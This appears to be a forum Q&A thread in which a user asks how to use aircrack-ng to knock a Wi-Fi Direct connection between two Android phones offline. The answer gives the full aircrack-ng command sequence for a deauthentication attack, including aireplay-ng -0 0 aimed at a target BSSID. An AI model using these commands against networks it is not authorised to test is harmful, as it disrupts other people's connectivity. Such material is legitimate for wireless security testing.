0

I used a Samsung Galaxy s7 as a Wifi Direct device to another android device (I think a Moto G Play) and I was wondering whether aircrack-ng could deauthenticate/disrupt the connection between them.

I tried using airodump-ng to discover the connection but to no avail. Is there any way of using aircrack-ng to deauthenticate the connections or do I have to use another software to do so? Any software recommendation of any OS would be appreciated.

The wifi adapter I have is an Alfa AWUS036NH wireless adapter with the RT3070 chipset.

Kenneth Chen
  • 5
  • 1
  • 5

1 Answers1

0

To send deauth packets first you need to bring your WiFi adapter in monitor mode. I'm using DELL laptop (INSPIRON N5050) which supports monitor mode.

I've installed Kali Linux and below are the commands to send deauth packets to particular AP.

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 1 --bssid [target bssid] wlan0mon
aireplay-ng -0 0 -a [target bssid] wlan0mon

airmon-ng stop wlan0mon
SMshrimant
  • 118
  • 5
  • I have tried the above method, however, when I use the airodump-ng method, I do not see my victim's device. (which is the Samsung Galaxy s7). I wish to "deauth" the s7 when it is in "wifi direct" mode. Is it possible to do so, or must I use a different software? – Kenneth Chen Mar 16 '18 at 06:42
  • Victim's device will only be visible by this method, if it's(victim's device that is Samsung Galaxy s7) connected to your AP. If the device is not connected to your AP, `airodump-ng wlan0mon` will give blank output – SMshrimant Jun 20 '18 at 11:40
  • if it worked for you, you can upvote @KennethChen – SMshrimant Sep 26 '19 at 11:07